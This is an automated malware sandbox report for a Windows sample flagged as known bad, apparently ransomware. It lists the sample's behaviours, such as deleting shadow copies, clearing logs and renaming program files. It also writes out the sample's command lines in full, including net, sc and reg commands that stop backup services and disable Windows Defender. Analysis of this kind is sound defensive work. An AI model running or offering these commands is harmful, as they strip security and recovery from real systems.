Analysis Overview
SHA256
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
Threat Level: Known bad
The file cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68 was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Modifies security service
Modifies Windows Defender Real-time Protection settings
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Interacts with shadow copies
Runs net.exe
Modifies registry class
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 10:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 10:58
Reported
2022-01-13 11:04
Platform
win7-en-20211208
Max time kernel
25s
Max time network
17s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Program Files\7-Zip\readme.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_isRhzZd1dmQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\Alphabet.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad\auxbase.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\InkWatson.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\adovbs.inc | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\va.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_HqyNaeRYRls0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\InkWatson.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Psychedelic.jpg | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipsesp.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\keypadbase.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-back-static.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mip.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipshrv.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\es-ES\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng2.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_wllXAL4Z8k00.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-split.avi | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tabskb.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Eurosti.TTF | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\mshwLatin.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_jpn.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ipsnor.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\micaut.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ky.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_L_rm1aJV7ho0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.jpg | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\FlickLearningWizard.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Blue_Gradient.jpg | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\micaut.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\msado27.tlb | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ta.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_PYXqwCqVp4g0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.jpg | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mr.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_Lt4HTXk86wc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\VSTO\vstoee100.tlb.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_PVkGWc8BZi00.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ms.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_Kssss1rRWcA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\mip.exe.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\en.ttt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_APEUeiuiXZI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ku.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_7Sf32L4R0Zw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\en-US\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\ja-JP\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\zh-phonetic.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\msado21.tlb | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bn.txt.880CSOo5uCluPz-_N2VuNegWT_elZi9HDPw1BHalW23_kTY8ud0ZvnY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
